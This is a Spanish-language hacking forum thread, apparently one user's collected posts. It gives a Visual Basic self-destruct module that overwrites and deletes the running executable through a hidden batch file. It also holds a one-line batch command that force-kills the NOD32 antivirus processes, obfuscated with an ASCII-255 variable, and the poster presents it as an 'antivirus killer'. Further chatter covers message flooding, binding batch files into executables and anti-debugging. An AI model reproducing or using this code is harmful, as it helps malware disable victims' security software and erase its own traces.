Mensajes

Es un modulo para autodestruir tu aplicacion de manera segura, cuando tu programa termine lo que debe hacer llama la funcion y listo... es sencillo y se le pueden hacer mas mejoraz....

Código [Seleccionar] Expandir

Public Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
Public Function AutoDestruccion()
Dim modName As String * 260, AK As String * 1024, PPATTH As String
Dim CA, BASUR As Integer

X = Left$(modName, GetModuleFileName(App.hInstance, modName, Len(modName)))
PPATTH = App.EXEName & Right(X, 4)
SetAttr X, 0
Randomize
CA = Int(Rnd * 255)
If CA = 0 Then CA = 35
For a = 1 To 1024
AK = AK + Chr(CA)
Next
BASUR = Int(Rnd * 10) + 1 + Int(Int(FileLen(X)) / 1024)

Open App.Path & "\" & "KVYTOQALYHRNN.TXT" For Binary As #1
For B = 1 To BASUR
Put #1, , AK
Next
Close #1
Open App.Path & "\" & "8GJ46F87385UYGHD64JFN.BAT" For Output As #2
Print #2, "TASKKILL /F /IM " & PPATTH
Print #2, "MOVE /Y KVYTOQALYHRNN.TXT " & PPATTH
Print #2, "DEL KVYTOQALYHRNN.TXT /Q"
Print #2, "RENAME " & PPATTH & " 1NOMEVES.TXT"
Print #2, "DEL 1NOMEVES.TXT"
Print #2, "GOTO X"
Print #2, "ERASE " & Chr(37) & "0"
Print #2, ":X"
Close #2
Shell App.Path & "\" & "8GJ46F87385UYGHD64JFN.BAT", vbHide
End Function

me referia a esto:

Print #Canal, "taskkill /F /IM " & App.EXEName & ".exe"

Como sabes que no le cambian la extension a otra ejecutable ya sabemos que(bat,com,pif,cmd,scr) funcionan en vb se pierde el icono pero sigue funcionando compilado.... mejor detecten todo.. ruta-nombre-entension... funca mas cuando usas el filecopy y no poner ".exe"... sugerencia... saludoz! 

y se le cambio la extension por com?

  se te habia olvidado?? 

si si funciona en vez de poner %%i o %%a etc pones...
%% + ascii 255 y funca!!!

No no cambia pero apoco no es distinto y mientras los antivirus no peten esto de la codificacion( o sea a = b y c = d) nos da un rato para despistar a nuestros oponentes los cuales esperan mas de lo mismo...


Pues, funciona...     hace su trabajo, estas en lo correcto!!!    es mas liviano no pesa tanto como el script anterior pero... no se puede modificar tanto como el otro, obviamente a menor tamaño menos le puedes cambiar.. y viceversa... en fin es una muestra de la infinita diversidad del codeo o scripteo... salutez!!! y ojala pongaz el tuyo!!! ieee!! 

como detalle casi todos los demas AVs caen ante este ataque por si no se han dado cuenta, basta con poner 1 linea para cada antivirus o 1 para todos(los mas conocidos o todos? jo jo jo  ) y BINGO!! bye bye AVs...  un killeravs a nacido.... saludoz!! y ojala que les sirva aunque sea algo.. HOOOOOOOOOM!   

ya expirado un tiempo revivo el post para poner el script para cerrar el nod32 (versiones 2 y 3) pero con una linea :

FOR %%  IN (%PATH%) DO (start taskkill /F /IM nod32krn.* /IM ekrn.* /IM nod32kui.* /IM egui.*)

La variable del for uso un caracter ascii 255 para  despistar y en la variable path funca si tenes muchos progras instalados sino usad cualquier strings minimo de 7 a 10 para que caiga el nod32.... saludoz!!  nhaalclkiemr ojala ya tengaz el tuyo quiesiera verlo... que opinas?

pues eso de transformar no le queda... mas bien encapsular el bat en un exe... o no? o acaso transforma el script del bat en codigo vb y luego lo compila??? 

ahora... no ver el codigo? ojala que no se vea editando el exe en un editor hexadesimal j0j0j0!! usas shell o pipe? de todaz formaz el codigo fuente de batch es expuesto jojojo.....saludoz!!!! 
uju!!! no no c puede invertir un bit!!! nomas dale power!!!! y yap!!!

pues... tiene varias desventajas este fl0000d! ya que primero ven quien envio todos esos mensajes y zas! ya te cacharon! otra en que todas las maquinas de la red tiene que tener el servicio activo.. te recomiendo mejor maniobrar con otro lenguaje para ocultar o poner lo que quieras de FROM

jejeje no te rias snip! que no ves que el colega skull es un buen scripter en batch en la CUH precisamente donde tu iniciaste!! vamos aprendiendo nop? si en efecto skull el programa en VB "EXE" que tu hagas ejecuta al *.bat que tu kieres no de manera ghost ms bien hide(oculta) y es como la mayoria de encapsuladores funciona... hasta el de hendryx y el quick batch.... y otros joiners jejeje.. saludoz!!! 

lo c, pero aplicando todas las tecnicas juntas hacen mas dificil obtener el user y pass o no? saluditoz snyper.. jajajaja 

mmm usando teclas!! usando metodos anti keygens!! anty ollyz!! joeer! packers buenazos!! cifrar toda string, usar PGP aja! toro! archivos llave tambien!!etc.